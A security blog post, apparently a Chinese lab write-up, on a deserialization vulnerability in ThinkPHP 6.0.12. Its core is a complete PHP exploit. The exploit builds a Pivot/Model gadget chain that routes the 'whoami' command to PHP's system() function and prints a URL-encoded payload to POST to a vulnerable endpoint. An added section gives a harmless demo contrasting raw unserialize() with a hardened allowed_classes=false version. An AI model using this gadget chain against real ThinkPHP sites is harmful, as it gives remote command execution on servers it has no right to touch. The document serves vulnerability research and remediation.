ThinkPHP V6.0.12LTS Deserialization Vulnerability

admin, July 3, 2022, 10:28:47

01

Environment Setup



composer create-project topthink/think=6.0.12 tp612


Add a deserialization entry point




02

Reproducing the Vulnerability



Exp

<?php
namespace think {
    // Stub of think\Model declaring only the properties that end up in the serialized payload
    abstract class Model {
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;

        public function __construct($obj = '') {
            $this->lazySave = true;
            $this->data = ['whoami' => ['whoami']];
            $this->exists = true;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami'];
            $this->jsonAssoc = true;
        }
    }
}

namespace think\model {
    use think\Model;

    // Concrete subclass of the abstract Model
    class Pivot extends Model {
    }

    // The outer Pivot carries an inner Pivot in $table; print the URL-encoded serialized form
    $p = new Pivot(new Pivot());
    echo urlencode(serialize($p));
}

Run the script to generate the payload.


On the vulnerable page, simply pass the parameter via POST.
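The entry point added in step 01 is not shown on the page. Assuming it hands a POST parameter to unserialize(), the following added example (not code from the original post or from ThinkPHP) puts that pattern beside a hardened form that refuses to instantiate classes from request data. DemoGadget, unsafeEntry, safeEntry and the sample string are hypothetical and constructed for illustration.

```php
<?php
// Added example, runs stand-alone on PHP 7+ without ThinkPHP.
// DemoGadget, unsafeEntry and safeEntry are hypothetical names.

// Stand-in for a framework class with a magic method; it only counts calls.
class DemoGadget
{
    public static $destructed = 0;
    public $table = '';

    public function __destruct()
    {
        self::$destructed++;
    }
}

// Pattern of the entry point: request data goes straight into unserialize().
function unsafeEntry(string $input)
{
    return unserialize($input);
}

// Hardened form: no class from request data is ever instantiated.
function safeEntry(string $input)
{
    return unserialize($input, ['allowed_classes' => false]);
}

// Constructed sample standing in for the POST parameter.
$post = 'O:10:"DemoGadget":1:{s:5:"table";s:0:"";}';

$obj = unsafeEntry($post);
unset($obj); // the attacker-chosen object is destroyed, so __destruct() runs
echo 'after unsafeEntry: ', DemoGadget::$destructed, PHP_EOL;

$val = safeEntry($post);
echo 'safeEntry returned: ', get_class($val), PHP_EOL;
unset($val); // the placeholder object has no DemoGadget destructor to run
echo 'after safeEntry: ', DemoGadget::$destructed, PHP_EOL;
```

Where the endpoint only needs arrays or scalars, exchanging JSON via json_decode() removes the unserialize() call altogether.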





Originally published on the WeChat official account 长风实验室: ThinkPHP V6.0.12LTS Deserialization Vulnerability
